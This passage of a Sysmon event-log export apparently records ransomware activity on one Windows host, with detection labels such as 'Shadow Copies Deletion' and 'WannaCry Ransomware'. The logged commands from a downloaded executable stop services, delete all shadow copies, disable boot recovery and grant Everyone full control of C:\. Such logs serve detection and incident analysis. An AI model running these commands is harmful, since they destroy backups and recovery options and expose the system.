Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00}\r\nParentProcessId: 6356\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.818"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-001038241a00}"",""processId"":""6444"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d164-5ec7-0000-0010551e1a00}"",""parentProcessId"":""6356"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:40.980",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.509 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00} +ProcessId: 6356 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.514619900Z"",""eventRecordID"":""974"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.509\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00}\r\nProcessId: 6356\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.509"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010551e1a00}"",""processId"":""6356"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.891",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.415 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010cb161a00} +ProcessId: 6148 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00} +ParentProcessId: 6976 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.448632500Z"",""eventRecordID"":""972"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.415\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010cb161a00}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00}\r\nParentProcessId: 6976\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.415"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010cb161a00}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d164-5ec7-0000-0010bb101a00}"",""parentProcessId"":""6976"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:40.853",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.292 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00} +ProcessId: 6976 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.302647400Z"",""eventRecordID"":""971"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.292\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00}\r\nProcessId: 6976\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.292"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010bb101a00}"",""processId"":""6976"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.206",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """,, +"May 23, 2020 @ 12:37:40.145",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.965 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-001044011a00} +ProcessId: 1644 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.988412900Z"",""eventRecordID"":""969"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.965\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-001044011a00}\r\nProcessId: 1644\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.965"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-001044011a00}"",""processId"":""1644"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.121",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.956 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-00105d001a00} +ProcessId: 5712 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.971699300Z"",""eventRecordID"":""968"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.956\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-00105d001a00}\r\nProcessId: 5712\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.956"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-00105d001a00}"",""processId"":""5712"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.053",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.947 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-0010bfff1900} +ProcessId: 5600 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.957005700Z"",""eventRecordID"":""966"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.947\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-0010bfff1900}\r\nProcessId: 5600\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.947"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-0010bfff1900}"",""processId"":""5600"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 